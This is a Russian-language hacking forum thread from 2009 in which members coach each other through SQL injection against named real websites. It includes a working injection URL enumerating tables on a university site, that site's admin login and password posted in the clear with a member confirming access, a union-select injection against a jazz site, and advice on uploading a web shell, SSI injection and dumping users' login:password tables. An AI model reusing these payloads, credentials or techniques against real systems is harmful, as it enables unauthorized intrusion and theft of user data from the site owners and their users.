Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LLIop0x

    LLIop0x New Member

    Joined:
    29 Mar 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Друзья, я был некорректен,
    версия 4.1.* (information_schema - нет)
    при попытке подбирать имя таблицы "TEST" сайт отвечает что не может найти таблицу "ABC.TEST".
    вопрос был как раз про этот суффикс.
    а еще подскажите как мне поможет шелл в добывании списка login:pass пользователей сайта
     
    #6181 LLIop0x, 29 Mar 2009
    Last edited: 29 Mar 2009
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Послушай ты чем читаешь? Тебе выше уже ответили, что не префикс это и не суффикс и не что то еще, это БД abc и в ней нет твоей таблицы!!!!!!!
     
  3. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Всё зависит от прав ...
    Например если есть возможность прочитать файл конфига бд или сценарий имеющий в себе конф данные,появиться возможность попасть в бд сайта... Это только один из примеров.
     
  4. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ну права это не проблема их и поднять можно...
     
    1 person likes this.
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Товарищ, это не суффикс, а имя базы, в которой находится таблица, из которой mysql пытается получить данные по твоему запросу.

    Если он так отвечает, значит такой таблицы в данной базе не существует. Подбирай дальше, пробуй другие имен таблиц – users, user, members, admin и тп


    Хорошо поможет. Можно даже сказать все сам сделает за тебя =) Сливай нужные таблицы через шелл

    Ох как же вы задолбали своими загадками... Уважаемые, вся необходимая теория имеется в статьях и мануалах. А если вы тут вопрос задаете по конкретной уязвимости, то будьте добры ПОСТИТЬ ССЫЛКУ. Скоро мы тут все телепатами станем... Спасибо за внимание
     
    1 person likes this.
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    самое интересное что после определенного интервала времени во всю трахая мозги, обычно выкладывают урлу.
    З.Ы. Я думаю что у нас jokester полутелепат:)))
     
  7. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Вот скуля с таблицами..............
    http://www.columbiasouthern.edu/facesofcsu/index.asp?id=-1'+or+1=(SELECT+TOP+1+TABLE_NAME+FRO

    M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('CourseInformation','Testimonials'

    ,'Corp_partner','States','Countries','Ad_Codes','AdminUsers','Affiliates','AppOnline','carthead','cartrows','CartRo

    wsOptions','Categories','Categories_Products','classes','classes_and_text','Corp_partner_description','Corp_pa

    rtner_featured','Counselor','customer','D99_REG','D99_Tmp','DiscOrder','DiscProd','dtproperties','EnrollmentSe

    ssion','Faces','Faculty','FORUM_A_REPLY'))--


    http://www.columbiasouthern.edu/admin/
    Username:admin
    Password:csupride12

    Как сюда шелл залить? ) Блин........может где нибудь ещё админка есть?
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    в чем проблема-то? Я в админке:)

    Спасибо
     
    1 person likes this.
  9. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Админка то админкой )) а шелл? Или я слепой? ))
     
    1 person likes this.
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    А сорри, не так понял, пока не вижу, ничего загружать не даёт, сплошной html какой-то, надо думать. Aктивку можно понятно впихать, но неинтересно
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ) А туда пароль другой:)
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    если там асп и только штмл вставляется, есть надежда что работаю SSI команды
    дерзайте =)
     
    2 people like this.
  13. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Здрацте , приятного времени сутак.

    Ближе к делу .

    3 стоплца .
    ht_tp://www.tsfjazz.com/podcast-detail.php?id=3+group+by+3+--

    но
    ht_tp://www.tsfjazz.com/podcast-detail.php?id=3+union+select+1,2,3+--

    неправленое количество стоплцоф
    Што мозно исправьте или где об етом поподробнее
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.tsfjazz.com/podcast-detail.php?id=-3/**/union/**/select/**/version(),2,3,4,5
    
     
    1 person likes this.
  15. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 Pashkela
    Што за брет, почему 5 их ?
    Когда , на 3 толко нормално отобразает страницу =(
     
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    order by юзай
     
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Сначала подбери кол-во полей через order+by+..., т.е. order+by+1 -ошибка? значит больше, и так д минимального числа пока нету ошибки) А вообще почитай темы про SQL-inj - там лучше написано ;)
     
  18. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 попугай

    Видел што советавали ползоваца group а не order
    но не ветом дело .

    2 Tigger

    Ето я знаю , видемо изменение в тексте ошибки ,можно взят как ответ ... Вот и ответил сам на свои вопрос )
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Там два запроса, их отлично видно в ошибке

    1-й 3 поля, без вывода
    2-ой 5 полей выводится

     
  20. LLIop0x

    LLIop0x New Member

    Joined:
    29 Mar 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ниатдам вам урл, хочу сам добить.(+урл в паблике вызовет фикс бага)

    запрос: '+AND+1=(SELECT+name+LIMIT+0,1)/*

    Column 'name' in field list is ambiguous - что это значит?(перевел, все равно не понятно как боротся с неоднозначностью???)
     
Thread Status:
Not open for further replies.